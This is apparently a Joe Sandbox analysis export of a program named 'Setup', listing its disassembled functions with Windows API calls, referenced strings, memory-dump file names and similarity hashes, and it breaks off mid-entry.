SetLastError.KERNEL32(0000000E,275F26E1,?,?,?,00000000,00000000,?), ref: 006FC0BF
GetCurrentThreadId.KERNEL32 ref: 006FC103
EnterCriticalSection.KERNEL32(00A6D6DC), ref: 006FC123
LeaveCriticalSection.KERNEL32(00A6D6DC), ref: 006FC147
CreateWindowExW.USER32(?,?,00000000,00A6D6DC,?,?,?,?,00000000,?,00000000), ref: 006FC1A1

Part of subcall function 00911069: GetProcessHeap.KERNEL32(00000008,00000008,00000000,00872C81,?,?,?), ref: 0091106E
Part of subcall function 00911069: HeapAlloc.KERNEL32(00000000,?,?,?), ref: 00911075

Strings

AXWIN UI Window, xrefs: 006FC22A
&_', xrefs: 006FC097

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: CriticalHeapSection$AllocCreateCurrentEnterErrorLastLeaveProcessThreadWindow
String ID: AXWIN UI Window$&_'
API String ID: 213679520-1023604466
Opcode ID: 008203435c3f703c7abc03e0d7e13d3f11139efa8be7fb0a8e18882d2611a547
Instruction ID: b855a774f62a778574d1cdeddec5186fbb530065a2b5fd2bdd207685380d37c3
Opcode Fuzzy Hash: 008203435c3f703c7abc03e0d7e13d3f11139efa8be7fb0a8e18882d2611a547
Instruction Fuzzy Hash: 0451D37260420DAFDB20CF59DD05BABBBF5FB45B24F10411AFA04A7390D7B1A915CBA0

Function 00700870 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 150fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000,?,?), ref: 007009B3
CloseHandle.KERNEL32(00000000), ref: 00700A10

Part of subcall function 00911995: AcquireSRWLockExclusive.KERNEL32(00A66A70,?,?,?,006EB3A6,00A67624,275F26E1,?,?,0093CBDD,000000FF,?,008898BD,275F26E1,?), ref: 009119A0
Part of subcall function 00911995: ReleaseSRWLockExclusive.KERNEL32(00A66A70,?,?,006EB3A6,00A67624,275F26E1,?,?,0093CBDD,000000FF,?,008898BD,275F26E1,?), ref: 009119DA

WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00700A77
CloseHandle.KERNEL32(00000000,?), ref: 00700A9D

Part of subcall function 00911944: AcquireSRWLockExclusive.KERNEL32(00A66A70,?,?,006EB417,00A67624,009A5310), ref: 0091194E
Part of subcall function 00911944: ReleaseSRWLockExclusive.KERNEL32(00A66A70,?,?,006EB417,00A67624,009A5310), ref: 00911981
Part of subcall function 00911944: WakeAllConditionVariable.KERNEL32(00A66A6C,?,?,006EB417,00A67624,009A5310), ref: 0091198C

Strings

html, xrefs: 0070096C
aix, xrefs: 00700971
&_', xrefs: 00700884

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ExclusiveLock$AcquireCloseFileHandleRelease$ConditionCreateVariableWakeWrite
String ID: aix$html$&_'
API String ID: 3683816281-3473297547
Opcode ID: 1986e4526ffdfbfe4a1397297b8a8365904f2bba4d097c475c2be9e7e77cc3cf
Instruction ID: 0fa366537c0cbc20fb94bcc4caaa8e04b9f9d123ae3e7c88bf0baeffce0db133
Opcode Fuzzy Hash: 1986e4526ffdfbfe4a1397297b8a8365904f2bba4d097c475c2be9e7e77cc3cf
Instruction Fuzzy Hash: 27616AB0E00348DFDB10CFA8DC59B9EBBF4EB55718F108219E111AB2D1D7B95A49CB92

Function 0072D070 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 144COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0072D0B7
std::_Lockit::_Lockit.LIBCPMT ref: 0072D0D9
std::_Lockit::~_Lockit.LIBCPMT ref: 0072D101
__Getctype.LIBCPMT ref: 0072D1DF
std::_Facet_Register.LIBCPMT ref: 0072D213
std::_Lockit::~_Lockit.LIBCPMT ref: 0072D247

Strings

&_', xrefs: 0072D09A

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID: &_'
API String ID: 1102183713-2411122644
Opcode ID: b8833aeb7f3a10949388085dca0af1b45b12f40a227f5fa0d7adafcdc0e3d3ed
Instruction ID: ce380e6d99a85b9af7cdb441a8a76dd4cb6f7b87bfee4cb2e4cdc7674516a7ff
Opcode Fuzzy Hash: b8833aeb7f3a10949388085dca0af1b45b12f40a227f5fa0d7adafcdc0e3d3ed
Instruction Fuzzy Hash: 79519BB0904209DFDB10CF98D841BAEFBB0FF44314F258169E815AB391DBB8AE05CB91

Function 007311A0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 007311DD
std::_Lockit::_Lockit.LIBCPMT ref: 007311FF
std::_Lockit::~_Lockit.LIBCPMT ref: 00731227
__Getcoll.LIBCPMT ref: 007312F1
std::_Facet_Register.LIBCPMT ref: 00731336
std::_Lockit::~_Lockit.LIBCPMT ref: 00731377

Strings

&_', xrefs: 007311B4

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetcollRegister
String ID: &_'
API String ID: 1184649410-2411122644
Opcode ID: c135660c1ab50bf9300aef1d7d2c8311ab7256d242ac090dd271996fe7bc7fc0
Instruction ID: ab3146f14a725d2f890464674a2045aa12d9c1e305d303ece2fd1820d6049f26
Opcode Fuzzy Hash: c135660c1ab50bf9300aef1d7d2c8311ab7256d242ac090dd271996fe7bc7fc0
Instruction Fuzzy Hash: 12519CB0D00218EFDB11DF94D884B9EFBB0FF40314F644159E815AB292DB78AE05CB81

Function 0071CBB0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 132windowstringCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000043A,00000000,00000074), ref: 0071CC31
lstrcpynW.KERNEL32(?,?,00000020), ref: 0071CCB1
MulDiv.KERNEL32(?,00000048,00000000), ref: 0071CCEE
SendMessageW.USER32(?,00000444,00000000,00000074), ref: 0071CD20

Strings

?, xrefs: 0071CCF4
t, xrefs: 0071CCFC
&_', xrefs: 0071CBB6

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: MessageSend$lstrcpyn
String ID: ?$t$&_'
API String ID: 3928028829-2297663230
Opcode ID: 3d2ebe84fe6c323b9b748d0374983e7745861d46cb45bd27cc5898436e559110
Instruction ID: bc89e89fe07446eeff6c56a2cee35f357b6b477251264339676a92296ea482cb
Opcode Fuzzy Hash: 3d2ebe84fe6c323b9b748d0374983e7745861d46cb45bd27cc5898436e559110
Instruction Fuzzy Hash: D6517371608385AFD721DFA4DC4ABDBBBE8BF85700F004919F689C6191D7749548CB92

Function 0084EDD0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 83libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Shlwapi.dll,-00000001,00000000,?,?,?,?,?,?,?,?,0085B51B,?), ref: 0084EDEF
GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 0084EE05
FreeLibrary.KERNEL32(00000000), ref: 0084EE48
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,0085B51B,?), ref: 0084EE64

Strings

&_', xrefs: 0084EDD3
Shlwapi.dll, xrefs: 0084EDE8
DllGetVersion, xrefs: 0084EDFF

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Library$Free$AddressLoadProc
String ID: DllGetVersion$Shlwapi.dll$&_'
API String ID: 1386263645-1659730795
Opcode ID: 01a751ca0c7f27eec762c675f5fcadbab918d9de962e79d7eef4ae00daaac5e7
Instruction ID: eaa681e99ce1a8a530eb4d6b38d572401c448c44e2ce5b333ee64e9a41e8fd44
Opcode Fuzzy Hash: 01a751ca0c7f27eec762c675f5fcadbab918d9de962e79d7eef4ae00daaac5e7
Instruction Fuzzy Hash: F321AE767083155BC714DF69E88666BFBE5FFD9315F40092DF859C3200EA30D8458B92

Function 00910F07 Relevance: 12.1, APIs: 8, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,009110B1,?,?,?,?), ref: 00910F2B
HeapAlloc.KERNEL32(00000000,?,?,?,?), ref: 00910F32

Part of subcall function 00910FFD: IsProcessorFeaturePresent.KERNEL32(0000000C,00910F19,00000000,?,009110B1,?,?,?,?), ref: 00910FFF

InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,009110B1,?,?,?,?), ref: 00910F42
VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,?,?,?), ref: 00910F69
RaiseException.KERNEL32(C0000017,00000000,00000000,00000000,?,?,?,?), ref: 00910F7D
InterlockedPopEntrySList.KERNEL32(00000000,?,?,?,?), ref: 00910F90
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?), ref: 00910FA3

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
String ID:
API String ID: 2460949444-0
Opcode ID: 3f07fe72eea003f824cfca3a900644c74896358e56c012581a0ccb380a8f931b
Instruction ID: a57327d4677d1014d138f8725a4706da8c4f118253c7610210bf06b0fb6c3ab8
Opcode Fuzzy Hash: 3f07fe72eea003f824cfca3a900644c74896358e56c012581a0ccb380a8f931b
Instruction Fuzzy Hash: 8211D332709215BBE73157E4AC4BFA6B62CAF85781F114420F912E63A0DAE6CCC656E0

Function 00708150 Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,275F26E1,?,?,?,0093E18D,000000FF), ref: 00708197
HeapFree.KERNEL32(00000000,?,?,275F26E1,?,?,?,0093E18D,000000FF), ref: 0070819D

Strings

RoGetActivationFactory, xrefs: 0070824B
DllGetActivationFactory, xrefs: 00708420
.dll, xrefs: 007083C4
&_', xrefs: 00708163, 00708616
combase.dll, xrefs: 00708250, 0070829E
CoIncrementMTAUsage, xrefs: 00708299

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Heap$FreeProcess
String ID: .dll$CoIncrementMTAUsage$DllGetActivationFactory$RoGetActivationFactory$combase.dll$&_'
API String ID: 3859560861-4023432018
Opcode ID: 2d36376aede604d9f39934b5195130432a8b8e1a5ad7762e95d8acd7a415938d
Instruction ID: d3546c9059efc1916268a2a4ea9f0afd7bc1a801a976c79e00f36eb9b2622c89
Opcode Fuzzy Hash: 2d36376aede604d9f39934b5195130432a8b8e1a5ad7762e95d8acd7a415938d
Instruction Fuzzy Hash: B7016DB1A04618ABD718DF98DC01B6AB7EDEB85730F10476EB871877C0DB7999018A91

Function 006FE860 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 306COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00A6830C,275F26E1,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00940BD5), ref: 006FE8CA
GetModuleFileNameW.KERNEL32(0000FFFF,00000104,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00940BD5), ref: 006FE944

Strings

&_', xrefs: 006FE87F

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: CriticalEnterFileModuleNameSection
String ID: &_'
API String ID: 764724386-2411122644
Opcode ID: 4c9315cf11879d57732742f5e601b2084e55d1d430160daa67e19f0f5dc5d979
Instruction ID: bde5a063c2866c760c78656857de792948e7bf243af2dd88281f096dfd67362e
Opcode Fuzzy Hash: 4c9315cf11879d57732742f5e601b2084e55d1d430160daa67e19f0f5dc5d979
Instruction Fuzzy Hash: EBC19C70A04259DFDF10CFA8DC44BAEBBB5BF49314F144059E905A73A0CBB6AD46CBA0

Function 00738FE0 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 291memoryCOMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000000), ref: 00739045
GetProcessHeap.KERNEL32(?,00000000), ref: 00739158
HeapFree.KERNEL32(00000000,?,00000000), ref: 0073915E
GetProcessHeap.KERNEL32(?,00000000), ref: 007391EF
HeapFree.KERNEL32(00000000,?,00000000), ref: 007391F5
CoUninitialize.COMBASE ref: 00739358

Strings

&_', xrefs: 00738E9A, 00738FF7, 00739411

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Heap$FreeProcess$InitializeUninitialize
String ID: &_'
API String ID: 4239879612-2411122644
Opcode ID: 8b4aa3282a8d382b6a3901d80a59e20ac3c9162913c12f4d749975e41e312f9a
Instruction ID: f57dfe322e17ed31d6eaf88d340447e1ea534f5b2a60f837a5b468f53bc3456d
Opcode Fuzzy Hash: 8b4aa3282a8d382b6a3901d80a59e20ac3c9162913c12f4d749975e41e312f9a
Instruction Fuzzy Hash: EAB19EB1D00319DFEF14CFA4C845BAEBBB8BF45314F104199E515AB292DBB8AA05CB60

Function 00719180 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 279windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000001,0000110A,00000004,?), ref: 00719281
SendMessageW.USER32(00000001,0000110A,00000001,00000000), ref: 007192B6
SendMessageW.USER32(?,0000110A,00000004,?), ref: 00719472
SendMessageW.USER32(?,0000110A,00000001,00000000), ref: 00719498

Strings

&_', xrefs: 00719194
roq, xrefs: 007191B3, 00719205, 00719242, 007192F3, 007194CF

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: MessageSend
String ID: roq$&_'
API String ID: 3850602802-4153446736
Opcode ID: 8933014060dddc15766efc2ba172dd9a8bef80939af7d1cd5dac650732ee2fc5
Instruction ID: 683caf134014f5694a906177de4dec75eb742ae4098ed9431fb9406b052eafd5
Opcode Fuzzy Hash: 8933014060dddc15766efc2ba172dd9a8bef80939af7d1cd5dac650732ee2fc5
Instruction Fuzzy Hash: DDB16D31A00218EFCB15CF68D894AEEBBF5FF48710F154169E916AB291DB34EC86CB50

Function 00846600 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 180synchronizationCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 008467A4
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 008467C0
GetExitCodeProcess.KERNEL32(00000000,00986D87), ref: 008467D1
CloseHandle.KERNEL32(00000000), ref: 008467DF

Strings

open, xrefs: 00846680
&_', xrefs: 00846617

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: CloseCodeErrorExitHandleLastObjectProcessSingleWait
String ID: open$&_'
API String ID: 2321548817-2297516816
Opcode ID: d01a3c83e0141adbe010c8bf8f7a325a90412866135deefc870f44ecdc22416b
Instruction ID: d0e3d18afade5fd583c807238217b802d287d098ca7580de01b87339e93559c3
Opcode Fuzzy Hash: d01a3c83e0141adbe010c8bf8f7a325a90412866135deefc870f44ecdc22416b
Instruction Fuzzy Hash: BF717A70A046598BDB04CFA8C8487AEBBB1FF49324F144259E825E73D1EB78AD45CB91

Function 007D2500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 007D2534
std::_Lockit::_Lockit.LIBCPMT ref: 007D2556
std::_Lockit::~_Lockit.LIBCPMT ref: 007D257E
std::_Facet_Register.LIBCPMT ref: 007D2674
std::_Lockit::~_Lockit.LIBCPMT ref: 007D26A8

Strings

&_', xrefs: 007D2517

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID: &_'
API String ID: 459529453-2411122644
Opcode ID: 94b1f5f5d13a8cf76aa48f7d497eaf0138c228eb2dfb9f2128235846f4a92d2c
Instruction ID: 3883d94facbbdf77a980961ebc3fb279883c1590e743156e367f68cbae209219
Opcode Fuzzy Hash: 94b1f5f5d13a8cf76aa48f7d497eaf0138c228eb2dfb9f2128235846f4a92d2c
Instruction Fuzzy Hash: 2551A170900209DFDB11CF98D955BADBBF0FF51314F24409AE815AB392DBB5AA06CB90

Function 0083C2B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0083C2E4
std::_Lockit::_Lockit.LIBCPMT ref: 0083C306
std::_Lockit::~_Lockit.LIBCPMT ref: 0083C32E
std::_Facet_Register.LIBCPMT ref: 0083C417
std::_Lockit::~_Lockit.LIBCPMT ref: 0083C44B

Strings

&_', xrefs: 0083C2C7

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID: &_'
API String ID: 459529453-2411122644
Opcode ID: b8637cef72920edaecd003d77a9d510ec20bb7809b1f59b8345b5cc9e043c0ed
Instruction ID: 707e7ed1aed58440348146e6426d7f13d186b10ea212893152232e8fffadeef5
Opcode Fuzzy Hash: b8637cef72920edaecd003d77a9d510ec20bb7809b1f59b8345b5cc9e043c0ed
Instruction Fuzzy Hash: A351AF70900249DFDB11CF98C844BAEBBB0FF81318F248159D815AB391DBB5AA05CBD1

Function 0090EBBC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 116threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0090EBD0
